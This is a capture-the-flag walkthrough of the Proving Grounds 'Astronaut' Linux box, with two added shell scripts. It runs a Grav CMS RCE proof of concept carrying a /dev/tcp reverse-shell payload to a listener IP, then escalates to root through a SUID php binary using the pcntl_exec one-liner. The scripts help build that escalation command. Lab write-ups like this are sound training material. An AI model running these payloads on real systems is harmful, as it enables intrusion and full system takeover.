Astronaut
Source: Proving Grounds OS: Linux Community Rating: Intermediate
Enumeration & Reconnaissance
I started with autorecon as usual, which revealed two open ports on the target:
SSH (22)
HTTP (80)
Service Analysis
Browsing to the HTTP service led me to a Grav CMS admin interface (grav-admin).

I checked the robots.txt file, which listed multiple directories, but after checking them all, they led nowhere.

I also discovered a login page for the admin. However, default credentials didn’t work, and I noticed that accounts lock after several failed attempts, so brute-forcing wasn’t an option.
Gaining Initial Access
After some research, I found multiple CVEs for Grav, one of which allowed remote code execution (RCE). I found a PoC and tried it.
Initially, my attempts failed when I included a trailing “/” at the end of the target URL. Once I removed the trailing slash, the exploit worked. For instance, while this command:
python cve_2.py -c "sh -i >& /dev/tcp/192.168.45.221/9999 0>&1" -t http://192.168.128.12/grav-admin/
didn’t work, this one did the trick:
python cve_2.py -c "sh -i >& /dev/tcp/192.168.45.221/9999 0>&1" -t http://192.168.128.12/grav-admin
This allowed me to get a reverse shell on the target.
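To show why the trailing slash matters, here is an added example in shell; it is not code from the writeup or from the PoC. It assumes (this is an assumption, not something the page states) that the PoC builds its request URLs by joining the -t value and a fixed path with a plain string join, the most common cause of this symptom: a target ending in "/" then produces "//" in the path, which a web server or front controller may route differently or reject. The `admin/login` path and the helper names are hypothetical; `safe_join` strips trailing slashes before joining, which is the fix a PoC author would apply.

```sh
#!/bin/sh
# Added example: illustrates the trailing-slash failure mode from the writeup.
# Assumption (not stated on the page): the PoC joins the -t target and a fixed
# path with a plain string join, so "target/" + "/path" becomes "target//path".

TARGET_WITH_SLASH='http://192.168.128.12/grav-admin/'
TARGET_NO_SLASH='http://192.168.128.12/grav-admin'
ADMIN_PATH='admin/login'   # hypothetical request path a PoC might append

# Naive join: what a PoC that does target + "/" + path ends up requesting.
naive_join() {
  printf '%s/%s\n' "$1" "$2"
}

# Safe join: strip every trailing slash from the target first, then join.
safe_join() {
  target=$1
  while [ "${target%/}" != "$target" ]; do
    target=${target%/}
  done
  printf '%s/%s\n' "$target" "$2"
}

# Print what each form produces for the two target spellings from the writeup.
demo() {
  for t in "$TARGET_WITH_SLASH" "$TARGET_NO_SLASH"; do
    printf 'target: %s\n  naive: %s\n  safe:  %s\n' "$t" \
      "$(naive_join "$t" "$ADMIN_PATH")" "$(safe_join "$t" "$ADMIN_PATH")"
  done
}

demo
```

Separately, the reverse-shell payload relies on bash's /dev/tcp pseudo-device and `>&` redirection; if the injected command is run by dash or another plain POSIX sh, it fails without any error reaching you, so when no connection arrives the first thing to try is wrapping the payload in `bash -c '...'`.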

Privilege Escalation
Once I had shell access, I ran linpeas.sh to identify further avenues for privilege escalation.
The scan revealed a cron job that executed every minute, running a PHP script. I attempted to inject into this PHP script, but soon realized the file was owned by www-data, meaning the shell remained at the same privilege level.

Continuing my search, I ran the following to look for SUID binaries owned by root:
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
This command revealed that PHP itself had the SUID bit set. Checking GTFOBins provided me with the code required to exploit this. I then executed the command to escalate privileges to root:
php -r "pcntl_exec('/bin/sh', ['-p']);"
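The following is an added example, not code from the writeup, that post-processes the SUID enumeration on a constructed sample of `find` output so it runs offline: it filters the listing down to setuid-root entries, then flags interpreters such as php among them, because a setuid interpreter can exec a shell that keeps the elevated effective uid (the `-p` argument tells bash-style shells not to drop it). The sample lines are constructed to resemble `ls -ldb` output and are not real output from the box; the function names are mine. Before running the pcntl_exec one-liner on a real target, also confirm the pcntl extension is loaded (`php -m | grep pcntl`), since pcntl_exec is undefined without it.

```sh
#!/bin/sh
# Added example: post-process SUID enumeration output and flag interpreters.
# SAMPLE is constructed to look like the output of
#   find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# It is not real output from the target.
SAMPLE='-rwsr-xr-x 1 root root 68208 Mar 14  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 4763568 Apr  4  2021 /usr/bin/php7.4
-rwsr-xr-x 1 root root 166776 Jan 19  2021 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus 51344 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwxr-xr-x 1 root root 35000 Jan  1  2021 /usr/bin/notsuid'

# Emit the path of every entry that is setuid (an "s" or "S" in the owner
# execute slot of the mode string) and owned by root.
suid_root_paths() {
  printf '%s\n' "$SAMPLE" | awk '$1 ~ /^...[sS]/ && $3 == "root" { print $NF }'
}

# Of those, report interpreters: each can exec a shell with the setuid
# effective uid preserved, which is what GTFOBins lists for php.
suid_interpreters() {
  suid_root_paths | grep -E '/(php|python|perl|ruby|node|lua)[0-9.]*$' || true
}

# Build the GTFOBins-style escalation command for a given php binary path.
php_escalation_cmd() {
  printf "%s -r \"pcntl_exec('/bin/sh', ['-p']);\"\n" "$1"
}

# Walk the sample: list setuid-root binaries, then the escalation command for php.
for p in $(suid_interpreters); do
  case "$p" in
    */php*) php_escalation_cmd "$p" ;;
  esac
done
```

On a live target, replace the SAMPLE heredoc with the real `find` command's output (pipe it into the same awk) and run the printed command; if `/bin/sh` on the box is bash, check `id` afterwards shows `euid=0`.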

Lessons Learned
Exploit Error: A subtle difference in the target URL (with or without a trailing slash) can make or break an exploit.
SUID Misconfiguration: A misconfigured SUID bit on the PHP binary was the path to privilege escalation.